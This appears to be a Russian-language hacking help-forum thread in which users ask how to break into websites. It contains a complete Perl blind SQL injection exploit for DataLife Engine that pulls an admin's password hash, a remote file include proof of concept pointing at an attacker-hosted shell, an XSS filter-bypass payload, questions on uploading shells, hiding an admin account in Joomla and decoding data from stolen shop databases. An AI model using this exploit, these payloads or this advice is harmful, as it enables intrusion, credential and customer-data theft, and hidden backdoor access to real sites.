[Задай Вопрос - Получи Ответ]

на запрос /stat_init_groovy?serviceIdentity=5 иногда можно получить вылет:

1. DB Error: no database selected
Code: 2013
Description: Lost connection to MySQL server during query
SQL: SELECT ss.id, ss.parent_id, ss.alias, ss.path, ss.c_img, ssd.name FROM sites_structure ss, sites_structure_desc ssd, sites_structure_access ssa WHERE ss.site_id='1' AND ssd.section_id=ss.id AND ssd.lang_id='1' AND ssa.section_id=ss.id AND ss.alias = 'group_wide' AND ssa.user_group_id IN (0, 1)

раскрыт SQL запрос, как его можно поюзать в плане подстановок?

куки:
b: b
PHPSESSID: ****************
services: 1
ua/group_mail/portal b: b
ua/group_wide/dsl_init b: b
ua/home_home_groovy b: b

 

group_wide я так понял указано с кукисов.. но придумать ему разумную подстановку не могу

 

Вообщем столкнулся с одним хитрым серваком )) Вообщем есть доступ в phpmyadmin.. но remote url include отрублен.... как залить шелл можно ?? Заливаю сбственно через phpmyadmin.

 

Как вставить скрипт в блог

Значит, вот скрипт который я хочу вставить <TABLE BACKGROUND="java script:alert('Я здесь был')"> Table background я использую для обхода фильтрации в блоге. При редактировании сообщения (предварительный просмотр) скрипт работает без проблем. Но в обычном режиме, когда сообщение уже размещено в блоге, этот (да и не только этот) скрипт перестает работать! В чём проблема???

 

Не могу понять что за хрень... По-моему вообще весь скрипт вырезается! А главное, если редактируешь это сообщение, то там всё на месте... Короче вот, сами попробуйте:

Регистрация: http://pdj.ru/register/
Блог: http://pdj.ru/cp/blog/add/

P.S. Чтобы писать в блоге нужно обязательно зарегиться и подтвердить e-mail!

 

TypeError in Search#index
Showing app/views/basic_posts/_item.html.erb where line #3 raised:

can't modify frozen hash

Extracted source (around line #3):

1: <li class="item">
2: <%= render artial => 'posts/meta', :locals => {:item => item, :top => local_assigns[:top]} %>
3: <h3><%= link_to_post item.title, item %></h3>
4: <div class="body formatted">
5: <% if @search %>
6: <%= item.parsed_body(current_user) %>


Trace of template inclusion: app/views/tops/_item.html.erb, app/views/search/index.html.erb

RAILS_ROOT: /home/xxx/releases/20090117051218

Application Trace | Framework Trace | Full Trace
vendor/rails/activerecord/lib/active_record/attribute_methods.rb:313:in `[]='
vendor/rails/activerecord/lib/active_record/attribute_methods.rb:313:in `write_attribute_without_dirty'
vendor/rails/activerecord/lib/active_record/dirty.rb:139:in `write_attribute'
vendor/rails/activerecord/lib/active_record/attribute_methods.rb:211:in `slug_cache='
lib/extensions/slug_cache.rb:16:in `update_slug_cache'
lib/extensions/slug_cache.rb:21:in `update_slug_cache!'
lib/extensions/slug_cache.rb:8:in `to_param'
(eval):16:in `blog_note_path'
app/controllers/application.rb:99:in `send'
app/controllers/application.rb:99:in `url_to_post'
(eval):2:in `send'
(eval):2:in `url_to_post'
app/helpers/application_helper.rb:80:in `link_to_post'
app/views/basic_posts/_item.html.erb:3
app/views/tops/_item.html.erb:1
app/views/search/index.html.erb:7
vendor/rails/activerecord/lib/active_record/attribute_methods.rb:313:in `[]='
vendor/rails/activerecord/lib/active_record/attribute_methods.rb:313:in `write_attribute_without_dirty'
vendor/rails/activerecord/lib/active_record/dirty.rb:139:in `write_attribute'
vendor/rails/activerecord/lib/active_record/attribute_methods.rb:211:in `slug_cache='
generated code (/home/xxx/releases/20090117051218/vendor/rails/actionpack/lib/action_controller/routing/route.rb:145):8:in `generate_raw'
generated code (/home/xxx/releases/20090117051218/vendor/rails/actionpack/lib/action_controller/routing/route.rb:154):2:in `generate'
vendor/rails/actionpack/lib/action_controller/routing/route_set.rb:343:in `generate'
vendor/rails/actionpack/lib/action_controller/url_rewriter.rb:208:in `rewrite_path'
vendor/rails/actionpack/lib/action_controller/url_rewriter.rb:187:in `rewrite_url'
vendor/rails/actionpack/lib/action_controller/url_rewriter.rb:165:in `rewrite'
vendor/rails/actionpack/lib/action_controller/base.rb:626:in `url_for'
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `send'
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `render'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:20:in `render'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:30:in `benchmark'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:19:in `render'
vendor/rails/actionpack/lib/action_view/template.rb:73:in `render_template'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:45:in `render_partial'
vendor/rails/actionpack/lib/action_view/partials.rb:152:in `render_partial'
vendor/rails/actionpack/lib/action_view/base.rb:258:in `render'
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `send'
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `render'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:20:in `render'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:30:in `benchmark'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:19:in `render'
vendor/rails/actionpack/lib/action_view/template.rb:73:in `render_template'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:45:in `render_partial'
vendor/rails/actionpack/lib/action_view/partials.rb:184:in `render_partial_collection'
vendor/plugins/ultrasphinx/lib/ultrasphinx/search.rb:433:in `map'
vendor/plugins/ultrasphinx/lib/ultrasphinx/search.rb:433:in `send'
vendor/plugins/ultrasphinx/lib/ultrasphinx/search.rb:433:in `method_missing'
vendor/rails/actionpack/lib/action_view/partials.rb:179:in `render_partial_collection'
vendor/rails/actionpack/lib/action_view/partials.rb:150:in `render_partial'
vendor/rails/actionpack/lib/action_view/base.rb:258:in `render'
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `send'
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `render'
vendor/rails/actionpack/lib/action_view/template.rb:73:in `render_template'
vendor/rails/actionpack/lib/action_view/base.rb:256:in `render'
vendor/rails/actionpack/lib/action_view/base.rb:367:in `_render_with_layout'
vendor/rails/actionpack/lib/action_view/base.rb:254:in `render'
vendor/rails/actionpack/lib/action_controller/base.rb:1177:in `render_for_file'
vendor/rails/actionpack/lib/action_controller/base.rb:896:in `render_without_benchmark'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:51:in `render_without_trace_View____determine_metric_path__Rendering'
vendor/rails/activesupport/lib/active_support/core_ext/benchmark.rb:8:in `realtime'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:51:in `render_without_trace_View____determine_metric_path__Rendering'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:138:in `render'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:41:in `trace_method_execution_with_scope'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:137:in `render'
vendor/rails/actionpack/lib/action_controller/base.rb:868:in `render_without_benchmark'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:51:in `render_without_trace_View____determine_metric_path__Rendering'
vendor/rails/activesupport/lib/active_support/core_ext/benchmark.rb:8:in `realtime'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:51:in `render_without_trace_View____determine_metric_path__Rendering'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:138:in `render'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:41:in `trace_method_execution_with_scope'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:137:in `render'
vendor/rails/actionpack/lib/action_controller/base.rb:1251:in `default_render'
vendor/rails/actionpack/lib/action_controller/base.rb:1257:in `perform_action_without_filters'
vendor/rails/actionpack/lib/action_controller/filters.rb:617:in `call_filters'
vendor/rails/actionpack/lib/action_controller/filters.rb:610:in `perform_action_without_benchmark'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:68:in `perform_action_without_rescue'
/usr/lib/ruby/1.8/benchmark.rb:293:in `measure'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:68:in `perform_action_without_rescue'
vendor/rails/actionpack/lib/action_controller/rescue.rb:136:in `perform_action_without_caching'
vendor/rails/actionpack/lib/action_controller/caching/sql_cache.rb:13:in `perform_action_without_newrelic_trace'
vendor/rails/activerecord/lib/active_record/connection_adapters/abstract/query_cache.rb:34:in `cache'
vendor/rails/activerecord/lib/active_record/query_cache.rb:8:in `cache'
vendor/rails/actionpack/lib/action_controller/caching/sql_cache.rb:12:in `perform_action_without_newrelic_trace'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/instrumentation/rails/action_controller.rb:58:in `passenger_orig_perform_action'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:41:in `trace_method_execution_with_scope'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/instrumentation/rails/action_controller.rb:47:in `passenger_orig_perform_action'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:18:in `trace_method_execution_no_scope'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/instrumentation/rails/action_controller.rb:41:in `passenger_orig_perform_action'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/request_handler.rb:53:in `perform_action'
vendor/rails/actionpack/lib/action_controller/base.rb:524:in `send'
vendor/rails/actionpack/lib/action_controller/base.rb:524:in `process_without_filters'
vendor/rails/actionpack/lib/action_controller/filters.rb:606:in `process_without_session_management_support'
vendor/rails/actionpack/lib/action_controller/session_management.rb:134:in `process'
vendor/rails/actionpack/lib/action_controller/base.rb:392:in `process'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:184:in `handle_request'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:112:in `dispatch_unlocked'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:125:in `dispatch'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:124:in `synchronize'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:124:in `dispatch'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:134:in `dispatch_cgi'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:41:in `dispatch_without_newrelic'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/instrumentation/dispatcher_instrumentation.rb:47:in `dispatch'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/request_handler.rb:38:in `process_request'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_request_handler.rb:165:in `main_loop'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:321:in `start_request_handler'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:282:in `handle_spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:163:in `safe_fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:161:in `fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:161:in `safe_fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:280:in `handle_spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:163:in `safe_fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:161:in `fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:161:in `safe_fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:279:in `handle_spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:317:in `__send__'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:317:in `main_loop'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:168:in `start_synchronously'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:135:in `start'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:112:in `fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:112:in `start'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:179:in `start'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:222:in `spawn_rails_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:217:in `synchronize'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:217:in `spawn_rails_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:126:in `spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:251:in `handle_spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:317:in `__send__'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:317:in `main_loop'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:168:in `start_synchronously'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/bin/passenger-spawn-server:46
vendor/rails/activerecord/lib/active_record/attribute_methods.rb:313:in `[]='
vendor/rails/activerecord/lib/active_record/attribute_methods.rb:313:in `write_attribute_without_dirty'
vendor/rails/activerecord/lib/active_record/dirty.rb:139:in `write_attribute'
vendor/rails/activerecord/lib/active_record/attribute_methods.rb:211:in `slug_cache='
lib/extensions/slug_cache.rb:16:in `update_slug_cache'
lib/extensions/slug_cache.rb:21:in `update_slug_cache!'
lib/extensions/slug_cache.rb:8:in `to_param'
generated code (/home/xxx/releases/20090117051218/vendor/rails/actionpack/lib/action_controller/routing/route.rb:145):8:in `generate_raw'
generated code (/home/xxx/releases/20090117051218/vendor/rails/actionpack/lib/action_controller/routing/route.rb:154):2:in `generate'
vendor/rails/actionpack/lib/action_controller/routing/route_set.rb:343:in `generate'
vendor/rails/actionpack/lib/action_controller/url_rewriter.rb:208:in `rewrite_path'
vendor/rails/actionpack/lib/action_controller/url_rewriter.rb:187:in `rewrite_url'
vendor/rails/actionpack/lib/action_controller/url_rewriter.rb:165:in `rewrite'
vendor/rails/actionpack/lib/action_controller/base.rb:626:in `url_for'
(eval):16:in `blog_note_path'
app/controllers/application.rb:99:in `send'
app/controllers/application.rb:99:in `url_to_post'
(eval):2:in `send'
(eval):2:in `url_to_post'
app/helpers/application_helper.rb:80:in `link_to_post'
app/views/basic_posts/_item.html.erb:3
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `send'
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `render'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:20:in `render'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:30:in `benchmark'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:19:in `render'
vendor/rails/actionpack/lib/action_view/template.rb:73:in `render_template'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:45:in `render_partial'
vendor/rails/actionpack/lib/action_view/partials.rb:152:in `render_partial'
vendor/rails/actionpack/lib/action_view/base.rb:258:in `render'
app/views/tops/_item.html.erb:1
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `send'
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `render'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:20:in `render'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:30:in `benchmark'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:19:in `render'
vendor/rails/actionpack/lib/action_view/template.rb:73:in `render_template'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:45:in `render_partial'
vendor/rails/actionpack/lib/action_view/partials.rb:184:in `render_partial_collection'
vendor/plugins/ultrasphinx/lib/ultrasphinx/search.rb:433:in `map'
vendor/plugins/ultrasphinx/lib/ultrasphinx/search.rb:433:in `send'
vendor/plugins/ultrasphinx/lib/ultrasphinx/search.rb:433:in `method_missing'
vendor/rails/actionpack/lib/action_view/partials.rb:179:in `render_partial_collection'
vendor/rails/actionpack/lib/action_view/partials.rb:150:in `render_partial'
vendor/rails/actionpack/lib/action_view/base.rb:258:in `render'
app/views/search/index.html.erb:7
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `send'
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `render'
vendor/rails/actionpack/lib/action_view/template.rb:73:in `render_template'
vendor/rails/actionpack/lib/action_view/base.rb:256:in `render'
vendor/rails/actionpack/lib/action_view/base.rb:367:in `_render_with_layout'
vendor/rails/actionpack/lib/action_view/base.rb:254:in `render'
vendor/rails/actionpack/lib/action_controller/base.rb:1177:in `render_for_file'
vendor/rails/actionpack/lib/action_controller/base.rb:896:in `render_without_benchmark'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:51:in `render_without_trace_View____determine_metric_path__Rendering'
vendor/rails/activesupport/lib/active_support/core_ext/benchmark.rb:8:in `realtime'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:51:in `render_without_trace_View____determine_metric_path__Rendering'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:138:in `render'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:41:in `trace_method_execution_with_scope'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:137:in `render'
vendor/rails/actionpack/lib/action_controller/base.rb:868:in `render_without_benchmark'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:51:in `render_without_trace_View____determine_metric_path__Rendering'
vendor/rails/activesupport/lib/active_support/core_ext/benchmark.rb:8:in `realtime'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:51:in `render_without_trace_View____determine_metric_path__Rendering'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:138:in `render'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:41:in `trace_method_execution_with_scope'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:137:in `render'
vendor/rails/actionpack/lib/action_controller/base.rb:1251:in `default_render'
vendor/rails/actionpack/lib/action_controller/base.rb:1257:in `perform_action_without_filters'
vendor/rails/actionpack/lib/action_controller/filters.rb:617:in `call_filters'
vendor/rails/actionpack/lib/action_controller/filters.rb:610:in `perform_action_without_benchmark'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:68:in `perform_action_without_rescue'
/usr/lib/ruby/1.8/benchmark.rb:293:in `measure'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:68:in `perform_action_without_rescue'
vendor/rails/actionpack/lib/action_controller/rescue.rb:136:in `perform_action_without_caching'
vendor/rails/actionpack/lib/action_controller/caching/sql_cache.rb:13:in `perform_action_without_newrelic_trace'
vendor/rails/activerecord/lib/active_record/connection_adapters/abstract/query_cache.rb:34:in `cache'
vendor/rails/activerecord/lib/active_record/query_cache.rb:8:in `cache'
vendor/rails/actionpack/lib/action_controller/caching/sql_cache.rb:12:in `perform_action_without_newrelic_trace'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/instrumentation/rails/action_controller.rb:58:in `passenger_orig_perform_action'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:41:in `trace_method_execution_with_scope'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/instrumentation/rails/action_controller.rb:47:in `passenger_orig_perform_action'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:18:in `trace_method_execution_no_scope'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/instrumentation/rails/action_controller.rb:41:in `passenger_orig_perform_action'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/request_handler.rb:53:in `perform_action'
vendor/rails/actionpack/lib/action_controller/base.rb:524:in `send'
vendor/rails/actionpack/lib/action_controller/base.rb:524:in `process_without_filters'
vendor/rails/actionpack/lib/action_controller/filters.rb:606:in `process_without_session_management_support'
vendor/rails/actionpack/lib/action_controller/session_management.rb:134:in `process'
vendor/rails/actionpack/lib/action_controller/base.rb:392:in `process'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:184:in `handle_request'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:112:in `dispatch_unlocked'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:125:in `dispatch'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:124:in `synchronize'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:124:in `dispatch'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:134:in `dispatch_cgi'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:41:in `dispatch_without_newrelic'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/instrumentation/dispatcher_instrumentation.rb:47:in `dispatch'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/request_handler.rb:38:in `process_request'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_request_handler.rb:165:in `main_loop'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:321:in `start_request_handler'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:282:in `handle_spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:163:in `safe_fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:161:in `fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:161:in `safe_fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:280:in `handle_spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:163:in `safe_fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:161:in `fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:161:in `safe_fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:279:in `handle_spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:317:in `__send__'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:317:in `main_loop'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:168:in `start_synchronously'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:135:in `start'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:112:in `fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:112:in `start'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:179:in `start'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:222:in `spawn_rails_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:217:in `synchronize'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:217:in `spawn_rails_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:126:in `spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:251:in `handle_spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:317:in `__send__'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:317:in `main_loop'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:168:in `start_synchronously'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/bin/passenger-spawn-server:46
Request
Parameters:

{"q"=>"xxx"}

Show session dump

---
:user_id: xxx
:return_to: /xxx/xxx/xxx/x
flash: !map:ActionController::Flash::FlashHash {}


Response
Headers:

{"X-Powered-By"=>"Phusion Passenger (mod_rails/mod_rack) 2.0.6",
"Content-Type"=>"text/html",
"cookie"=>[],
"Cache-Control"=>"no-cache"}

Можно ли что-то с этим сделать?
и кста, как прятать в спойлеры?

 

E-commerce. Алго.?

Всем привет!

Подскажите если кто знает, дело такое.
Слил пару баз с нескольких ресурсов, крутились на OsCommerce,
там же прикручен модуль E-Commerce Engine (кто знает, тот знает).
В базе некоторые данные имеют не читабельный вид
пример:
(b?NЇi3e_©µгbђоЂ1)

От сюда вопрос:
Хранятся ли алго. в скриптах?
Если да, то какие нужно слить?

Спасибо!

p.s. Если не туда запостил - сорри!

 

^ Может кодировка албанская ? =)

 

Подскажите можно-ли в joomla (1.5.4 ) имея полный доступ к FTP и к joomle создать там скрытую учетную запись - с правами администратора - но чтобы она в админ панели не светилась. И с помощью нее управлять cms.
Спасибо!

 

Возник вопрос, пробую спойлом получить доступ, но к сожалению не выходит. Может ли кто-то подсказать ,каким образом, или спойлом можно вскрыть админа? А еще лучше доступ на сервер..




Сплой:

Code:

#!/usr/bin/perl

## DataLife Engine sql injection exploit by RST/GHC
## (c)oded by 1dt.w0lf
## RST/GHC
## http://rst.void.ru
## http://ghc.ru
## 18.06.06

use LWP::UserAgent;
use Getopt::Std;

getopts('u:n:p:');

$url  = $opt_u;
$name = $opt_n;
$prefix = $opt_p || 'dle_';

if(!$url || !$name) { &usage; }

$s_num = 1;
$|++;
$n = 0;
&head;
print "\r\n";
print " [~]      URL : $url\r\n";
print " [~] USERNAME : $name\r\n";
print " [~]   PREFIX : $prefix\r\n";
$userid = 0;
print " [~] GET USERID FOR USER \"$name\" ...";
$xpl = LWP::UserAgent->new() or die;
$res = $xpl->get($url.'?subaction=userinfo&user='.$name);
if($res->as_string =~ /do=lastcomments&userid=(\d*)/) { $userid = $1; }
elsif($res->as_string =~ /do=pm&doaction=newpm&user=(\d*)/) { $userid = $1; }
elsif($res->as_string =~ /do=feedback&user=(\d*)/) { $userid = $1; }
if($userid != 0 ) { print " [ DONE ]\r\n"; }
else { print " [ FAILED ]\r\n"; exit(); }
print " [~]   USERID : $userid\r\n";

print " [~] SEARCHING PASSWORD ...  ";

while(1)
{
if(&found(47,58)==0) { &found(96,103); } 
$char = $i;
if ($char=="0") 
 { 
 if(length($allchar) > 0){
 print qq{\b  [ DONE ] 
 ---------------------------------------------------------------
  USERNAME : $name
    USERID : $userid
  PASSHASH : $allchar
 ---------------------------------------------------------------
 };
 }
 else
 {
 print "\b[ FAILED ]";
 }
 exit();  
 }
else 
 {  
 $allchar .= chr($char);
 print "\b".chr($char)." ";
 }
$s_num++;
}

sub found($$)
 {
 my $fmin = $_[0];
 my $fmax = $_[1];
 if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
 
 $r = int($fmax - ($fmax-$fmin)/2);
 $check = "/**/BETWEEN/**/$r/**/AND/**/$fmax";
 if ( &check($check) ) { &found($r,$fmax); }
 else { &found($fmin,$r); }
 }
 
sub crack($$)
 {
 my $cmin = $_[0];
 my $cmax = $_[1];
 $i = $cmin;
 while ($i<$cmax)
  {
  $crcheck = "=$i";
  if ( &check($crcheck) ) { return $i; }
  $i++;
  }
 $i = 0;
 return $i;
 }
 
sub check($)
 {
 $n++;
 status();
 $ccheck = $_[0]; 
 $xpl = LWP::UserAgent->new() or die;
 $res = $xpl->get($url.'?subaction=userinfo&user='.$name.'%2527 and ascii(substring((SELECT password FROM '.$prefix.'users WHERE user_id='.$userid.'),'.$s_num.',1))'.$ccheck.'/*');
 if($res->as_string =~ /$name<\/td>/) { return 1; }
 else { return 0; }
 }
 
sub status()
{
  $status = $n % 5;
  if($status==0){ print "\b/";  }
  if($status==1){ print "\b-";  }
  if($status==2){ print "\b\\"; }
  if($status==3){ print "\b|";  }
}

sub usage()
 {
 &head;
 print q(
  USAGE:
  r57datalife.pl [OPTIONS]
  
  OPTIONS:
  -u <URL>      - path to index.php
  -n <USERNAME> - username for bruteforce
  -p [prefix]   - database prefix
  
  E.G.
  r57datalife.pl -u http://server/index.php -n admin
 ---------------------------------------------------------------
 (c)oded by 1dt.w0lf
 RST/GHC , http://rst.void.ru , http://ghc.ru
 );
 exit();
 }
sub head()
 {
 print q(
 ---------------------------------------------------------------
       DataLife Engine sql injection exploit by RST/GHC
 ---------------------------------------------------------------
 );
 }

Инфо по серверу:

Заранее благодарен

 

Доброго времени суток. есть проблема.
Имеется сайт на движке irokez(на локальной машине). Нашел к нему на милворме php-инклуд. вот что там написано:

Code:

Vulnerable Code:
+ scripts/gallery.scr.php, line(s) 11-12:
+ -> 11: require_once "{$GLOBALS['PTH']['func']}gallery.func.php";
+ -> 12: require_once "{$GLOBALS['PTH']['classes']}gallery.class.php";

+ Proof Of Concept:

http://[target]/[path]/scripts/gallery.scr.php?GLOBALS[PTH][func]=http://evilsite.com/shell.php?

Я составил ссылку
http://irokez/scripts/gallery.scr.php?GLOBALS[PTH][func]=http://evil/shell.php?command=ipconfig

шелл не сработал... Выдал

Code:

Warning: main(gallery.func.php) [function.main]: failed to open stream: No such file or directory in Z:\home\irokez\www\scripts\gallery.scr.php on line 11

Fatal error: main() [function.require]: Failed opening required 'gallery.func.php' (include_path='.;/usr/local/php/PEAR') in Z:\home\irokez\www\scripts\gallery.scr.php on line 11

Что я делаю не так?

 

register_globals = on или off? для удачной эксплуатации нужно что бы был в on

 

f3d
1)
php.ini
=>allow_url_include = On
=>register_globals = on
2)
Файл http://evil/shell.php существует
3)
Баг не пофикшен

Это условия , при которых должно работать

Проверь всё это

 

нет. нельзя
